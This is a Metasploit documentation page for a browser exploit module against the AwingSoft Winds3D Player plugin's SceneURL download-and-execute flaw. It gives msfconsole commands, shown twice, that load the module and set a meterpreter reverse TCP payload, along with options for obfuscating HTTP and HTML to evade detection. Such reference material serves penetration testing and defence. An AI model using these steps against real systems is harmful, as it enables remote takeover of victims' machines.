Metasploit Penetration Testing Framework
AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
This module exploits an untrusted program execution vulnerability within the Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL' parameter to the URL to an executable, an attacker can execute arbitrary code. Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and IE 8 on Windows XP SP3.
Rank
- Excellent
Authors
- jduck < jduck [at] metasploit.com >
References
Exploit Targets
- 0 - Automatic (default)
Development
Similar Modules
- exploit/windows/browser/adobe_flashplayer_newfunction
- exploit/windows/browser/adobe_flatedecode_predictor02
- exploit/windows/browser/adobe_geticon
- exploit/windows/browser/adobe_jbig2decode
- exploit/windows/browser/adobe_media_newplayer
- exploit/windows/browser/adobe_utilprintf
- exploit/windows/browser/aim_goaway
- exploit/windows/browser/amaya_bdo
- exploit/windows/browser/aol_ampx_convertfile
- exploit/windows/browser/aol_icq_downloadagent
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/browser/awingsoft_winds3d_sceneurl
msf exploit(awingsoft_winds3d_sceneurl) > show payloads
msf exploit(awingsoft_winds3d_sceneurl) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(awingsoft_winds3d_sceneurl) > set LHOST [MY IP ADDRESS]
msf exploit(awingsoft_winds3d_sceneurl) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/browser/awingsoft_winds3d_sceneurl
msf exploit(awingsoft_winds3d_sceneurl) > show payloads
msf exploit(awingsoft_winds3d_sceneurl) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(awingsoft_winds3d_sceneurl) > set LHOST [MY IP ADDRESS]
msf exploit(awingsoft_winds3d_sceneurl) > exploit
Module Options
| SRVHOST | The local host to listen on. (default: 0.0.0.0) |
| SRVPORT | The local port to listen on. (default: 8080) |
| SSL | Negotiate SSL for incoming connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
| URIPATH | The URI to use for this exploit (default is random) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| WORKSPACE | Specify the workspace for this module |
| HTML::base64 | Enable HTML obfuscation via an embeded base64 html object (accepted: none, plain, single_pad, double_pad, random_space_injection) |
| HTML::javascript::escape | Enable HTML obfuscation via HTML escaping (number of iterations) |
| HTML::unicode | Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be) |
| HTTP::chunked | Enable chunking of HTTP responses via "Transfer-Encoding: chunked" |
| HTTP::compression | Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate) |
| HTTP::header_folding | Enable folding of HTTP headers |
| HTTP::junk_headers | Enable insertion of random junk HTTP headers |
| TCP::max_send_size | Maximum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |
Metasploit Framework
Copyright © 2003-2010 Rapid7 LLC
Rapid7 Privacy Statement
Rapid7 Privacy Statement